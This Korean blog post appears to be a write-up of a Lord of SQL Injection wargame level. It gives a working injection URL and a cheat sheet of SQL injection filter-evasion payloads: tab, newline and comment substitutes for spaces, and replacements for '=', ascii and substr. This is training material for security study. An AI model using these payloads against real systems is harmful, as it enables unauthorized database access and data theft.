5번 



띄어쓰기 우회 %09

*SQL Injection 공격시 공백 문자 필터링시 우회 방법


https://los.eagle-jump.org/wolfman_f14e72f8d97e3cb7b8fe02bef1590757.php?pw='or%091=1%09limit%091,1%23

공백문자를 필터링해서 우선 모든 칼럼이 나오게 설정한뒤 limit로 값을 지정해준다 

 





1. Tab : %09


  - no=1%09or%09id='admin'


 2. Line Feed (\n): %0a


  - no=1%0aor%0aid='admin'


3. Carrage Return(\r) : %0d


  - no=1%0dor%0did='admin'


 4. 주석 : /**/


  - no=1/**/or/**/id='admin'


 5. 괄호 : ()


  - no=(1)or(id='admin')


 6. 더하기 : +


  - no=1+or+id='admin'


우회문자


'=' -> like,<>,in


ascii -> ord()


substr->substring,left,right,mid

'WARGAME > LOS' 카테고리의 다른 글

[LOS] 7번 문제-orge  (0) 2017.12.09
[LOS] 6번 문제-darkelf  (0) 2017.12.09
[LOS] 4번 문제-orc  (0) 2017.12.09
[LOS] 3번 문제-goblin  (0) 2017.12.08
[LOS] 2번 문제-cobolt  (0) 2017.12.08

+ Recent posts

티스토리툴바